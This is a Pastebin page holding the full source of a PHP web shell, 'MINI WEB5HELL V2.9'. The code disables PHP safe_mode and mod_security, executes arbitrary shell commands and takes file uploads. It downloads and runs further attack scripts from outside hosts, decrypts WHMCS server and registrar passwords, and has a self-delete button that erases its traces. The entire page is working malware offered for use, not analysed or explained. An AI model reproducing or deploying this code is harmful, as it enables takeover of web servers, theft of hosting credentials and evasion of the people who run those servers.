API tools faq
paste
AZZATSSINS_CYBERSERK

MINI WEB5HELL V2.9

AZZATSSINS_CYBERSERK
May 14th, 2016
211
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 9.19 KB | None | 0 0
raw download clone embed print report
  1. <?php //Jangan Pernah Ragu....!!! Lakukanlah...!!! ?>
  2. <title>MINI WEB5HELL</title><body bgcolor=silver><center>
  3. <div style=background:#3b0001;margin:0px;padding:7px;text-align:center;color:silver;>
  4. <div style=background:black;margin:0px;padding:3px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a href=mailto:cyberserkers@gmail.com>AZZATSSINS CYBERSERKERS</a></b></i><br></div><div style=background:#2e2e2e;margin:0px;padding:4px;text-align:center;color:silver;><i><b><form method="post"><input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;" name="config" value="CONFIG" type="submit"><br><input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;" name="mysql" value="MYSQL" type="submit"> <input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;" name="symlink" value="SYMLINK" type="submit"><br><input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;" name="wdecode" value="DWHM" type="submit"> <input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;" name="rwhm" value="RWHM" type="submit"> <input style="background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;" name="dead" value="KILLSELF" type="submit"></form></b></i></div></center>
  5. <?php
  6. @session_start();
  7. @error_reporting(0);
  8. @ini_set('error_log',NULL);
  9. @ini_set('log_errors',0);
  10. @ini_set('max_execution_time',0);
  11. @ini_set('display_errors', 0);
  12. @set_time_limit(0);
  13. @set_magic_quotes_runtime(0);
  14. echo ini_get("safe_mode");
  15.  echo ini_get("open_basedir");
  16.  ini_restore("safe_mode");
  17.  ini_restore("open_basedir"); $phi = fopen("php.ini","w+");
  18. fwrite($phi,"safe_mode = Off
  19. disable_functions = NONE
  20. safe_mode_gid = OFF
  21. open_basedir = OFF ");$phii = fopen(".htaccess","w+");
  22. fwrite($phii,"<IfModule mod_security.c>
  23. KillFilterEngine Off
  24. KillFilterScanPOST Off
  25. KillFilterCheckURLEncoding Off
  26. KillFilterCheckUnicodeEncoding Off
  27. </IfModule>
  28. ");
  29. $currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
  30. $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
  31.  
  32. $UName  = `uname -a`;
  33. $SCWD   = `pwd`;
  34. $UserID = `id`;
  35.  
  36. if( $currentWD == "" ) {
  37.     $currentWD = $SCWD;
  38. }
  39.  
  40.  
  41. if( $_POST['_act'] == "List!" ) {
  42.     $currentCMD = "ls -la";
  43. }
  44.  
  45. echo "<center><div style=background:black;margin:0px;padding:6px;text-align:center;color:silver;><div style=background:#222222;margin:0px;padding:6px;text-align:center;color:silver;><form method=post enctype='multipart/form-data'><b>CMD <input size=10 name='_cmd' value='".$currentCMD."'><input style='background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;' type=submit name=_act value='EXEC'>   <b>DIR <input size=10 name='_cwd' value='".$currentWD."'><input style='background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;' type=submit name=_act value='List!'><br><input size=10 type=file name=_upl><input style='background:dodgerblue;margin:1px;width:15%;padding:0px;color:red;border:0;font-weight:bold;' type=submit name=_act value='UPLOAD'></form></div></div></center><br><hr><br>";
  46. if($_POST['symlink']){
  47. $get = file_get_contents('http://x-x-x.yn.lt/py');
  48. $bwt = fopen('symlink.py', 'w');
  49. fwrite($bwt,$get);
  50. fclose($bwt);
  51. system('python symlink.py');system('rm symlink.py');
  52. echo'<meta http-equiv="Refresh" content= "0; url=sl">'; }
  53. if($_POST['rwhm']){
  54. $get = file_get_contents('http://wget.yu.tl/files/ah.css');
  55. $bwt = fopen('rw.php', 'w');
  56. fwrite($bwt,$get);
  57. fclose($bwt);
  58. echo'<meta http-equiv="Refresh" content= "0; url=rw.php">';
  59. }
  60. if($_POST['config']){
  61. $get = file_get_contents('http://pastebin.com/raw/upPW1A8Y');
  62. $bwt = fopen('cg.php', 'w');
  63. fwrite($bwt,$get);
  64. fclose($bwt);
  65. echo'<meta http-equiv="Refresh" content= "0; url=cg.php">';
  66. }
  67. if($_POST['mysql']){
  68. $get = file_get_contents('http://wget.yu.tl/files/mysql.css');
  69. $bwt = fopen('mysql.php', 'w');
  70. fwrite($bwt,$get);
  71. fclose($bwt);
  72. echo'<meta http-equiv="Refresh" content= "0; url=mysql.php">';
  73. }
  74. if($_POST['dead']){
  75. system("rm -rf CONFIG");system("rm symlink.py"); system("rm mysql.php"); system("rm -rf sl");system("rm rw.php");system("rm php.ini");system("rm.htaccess");system("rm cg.php"); unlink('cg.php'); $fn=$_SERVER['SCRIPT_FILENAME'];unlink($fn); system("rm ".$fn); echo'<meta http-equiv="Refresh" content= "0; url=?">';
  76. }
  77.  
  78. if($_POST['wdecode']){
  79. function decrypt ($string,$cc_encryption_hash)
  80. {
  81.     $key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
  82.     $hash_key = _hash ($key);
  83.     $hash_length = strlen ($hash_key);
  84.     $string = base64_decode ($string);
  85.     $tmp_iv = substr ($string, 0, $hash_length);
  86.     $string = substr ($string, $hash_length, strlen ($string) - $hash_length);
  87.     $iv = $out = '';
  88.     $c = 0;
  89.     while ($c < $hash_length)
  90.     {
  91.         $iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
  92.         ++$c;
  93.     }
  94.     $key = $iv;
  95.     $c = 0;
  96.     while ($c < strlen ($string))
  97.     {
  98.         if (($c != 0 AND $c % $hash_length == 0))
  99.         {
  100.             $key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
  101.         }
  102.         $out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
  103.         ++$c;
  104.     }
  105.     return $out;
  106. }
  107.  
  108. function _hash ($string)
  109. {
  110.     if (function_exists ('sha1'))
  111.     {
  112.         $hash = sha1 ($string);
  113.     }
  114.     else
  115.     {
  116.         $hash = md5 ($string);
  117.     }
  118.     $out = '';
  119.     $c = 0;
  120.     while ($c < strlen ($hash))
  121.     {
  122.         $out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
  123.         $c += 2;
  124.     }
  125.     return $out;
  126. }
  127.  
  128. echo "
  129. <br>
  130.  
  131. <FORM method='post'>
  132. <input type='hidden' name='form_action' value='2'>
  133. <br>
  134. <table class=tabnet style=width:320px;padding:0 1px;>
  135. <tr><th colspan=2>WHMCS Decoder</th></tr>
  136. <tr><td>db_host </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
  137. <tr><td>db_username </td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
  138. <tr><td>db_password</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
  139. <tr><td>db_name</td><td><input type='text' style='color:#FF0000;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
  140. <tr><td>cc_encryption_hash</td><td><input style='color:#FF0000;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
  141. <td>&nbsp;&nbsp;&nbsp;&nbsp;<INPUT class='inputzbut' type='submit' style='color:#FF0000;background-color:'  value='Submit' name='Submit'></td>
  142. </table>
  143. </FORM>
  144. </center>
  145. ";
  146.  
  147.  if($_POST['form_action'] == 2 )
  148.  {
  149.  //include($file);
  150.  $db_host=($_POST['db_host']);
  151.  $db_username=($_POST['db_username']);
  152.  $db_password=($_POST['db_password']);
  153.  $db_name=($_POST['db_name']);
  154.  $cc_encryption_hash=($_POST['cc_encryption_hash']);
  155.  
  156.  
  157.  
  158.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  159.         mysql_select_db($db_name,$link) ;
  160. $query = mysql_query("SELECT * FROM tblservers");
  161. while($v = mysql_fetch_array($query)) {
  162. $ipaddress = $v['ipaddress'];
  163. $username = $v['username'];
  164. $type = $v['type'];
  165. $active = $v['active'];
  166. $hostname = $v['hostname'];
  167. echo("<center><table border='1'>");
  168. $password = decrypt ($v['password'], $cc_encryption_hash);
  169. echo("<tr><td>Type</td><td>$type</td></tr>");
  170. echo("<tr><td>Active</td><td>$active</td></tr>");
  171. echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
  172. echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
  173. echo("<tr><td>Username</td><td>$username</td></tr>");
  174. echo("<tr><td>Password</td><td>$password</td></tr>");
  175.  
  176. echo "</table><br><br></center>";
  177. }
  178.  
  179.     $link=mysql_connect($db_host,$db_username,$db_password) ;
  180.         mysql_select_db($db_name,$link) ;
  181. $query = mysql_query("SELECT * FROM tblregistrars");
  182. echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
  183. echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
  184. while($v = mysql_fetch_array($query)) {
  185. $registrar     = $v['registrar'];
  186. $setting = $v['setting'];
  187. $value = decrypt ($v['value'], $cc_encryption_hash);
  188. if ($value=="") {
  189. $value=0;
  190. }
  191. $password = decrypt ($v['password'], $cc_encryption_hash);
  192. echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
  193. }
  194. }
  195. }
  196.  
  197. $currentCMD = str_replace("\\\"","\"",$currentCMD);
  198. $currentCMD = str_replace("\\\'","\'",$currentCMD);
  199.  
  200. if( $_POST['_act'] == "UPLOAD" ) {
  201.     if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
  202.         echo "<center><b>Error While Uploading File!</b></center>";
  203.     } else {
  204.         echo "<center><pre>";
  205.         system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
  206.         echo "</pre><b>File Uploaded Successfully!</b></center>";
  207.     }    
  208. } else {
  209.     echo "<b><br><br><pre><br>";
  210.     $currentCMD = "cd ".$currentWD.";".$currentCMD;
  211.     system($currentCMD);
  212.     echo "<br></pre><br></b>";
  213. }
  214. ?>
  215. <br><hr><br><center><b>[+] Go A Head [+]</b></center>
  216. <?php //What The MotherFucker Do You Want...??? ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!